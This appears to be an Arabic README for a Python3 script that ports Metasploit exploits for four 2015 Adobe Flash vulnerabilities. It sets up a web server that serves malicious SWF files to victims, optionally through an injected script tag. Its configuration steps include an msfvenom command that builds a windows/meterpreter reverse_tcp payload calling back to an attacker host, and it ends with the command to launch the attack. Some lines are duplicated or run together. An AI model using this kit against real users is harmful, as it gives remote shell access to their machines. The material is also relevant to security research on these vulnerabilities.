
تم تحويل استغلالات Metasploit لثغرات Adobe Flash التالية: CVE-2015-3090 وCVE-2015-3105 وCVE-2015-5119 وCVE-2015-5122 إلى سكربت Python3.
تم تحويل استغلالات Metasploit الخاصة بثغرات Adobe Flash CVE-2015-3090 و CVE-2015-3105 و CVE-2015-5119 و CVE-2015-5122 إلى سكربت Python3.
سيستضيف هذا السكربت خادم ويب يمكنه استغلال واحدة من ثغرات Adobe Flash التالية في كل مرة:
يجب عليك إجراء تغييرات (موضحة هنا) على exploit.py لتناسب احتياجاتك.
hostname = "192.168.1.100"
serverPort = 8080
xss = False
True، فسيتم التعامل مع أول طلب من الضحية إلى الخادم على أنه JavaScript:
<script src="http://192.168.1.100:8080/"></script>False، فسيتم التعامل مع أول طلب من الضحية إلى الخادم على أنه HTML:
http://192.168.1.100:8080/base64Payload = "..."
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 | base64ملاحظة: الحمولة الوحيدة التي نجحت معي هي
windows/meterpreter/reverse_tcp.
swfFile = swfFileList['37368']
swfFileList = {
'37368': 'CVE-2015-3090.swf',
'37448': 'CVE-2015-3105.swf',
'37523': 'CVE-2015-5119.swf',
'37599': 'CVE-2015-5122.swf'
}
شغّل الأمر التالي، في نفس الدليل الذي توجد فيه ملفات swf الخبيثة، لتنفيذ سكربت استغلال Adobe Flash:
python3 exploit.pyCVE-2015-3090 -> https://exploit-db.com/exploits/37368
CVE-2015-3105 -> https://exploit-db.com/exploits/37448
CVE-2015-5119 -> https://exploit-db.com/exploits/37523
CVE-2015-5122 -> https://exploit-db.com/exploits/37599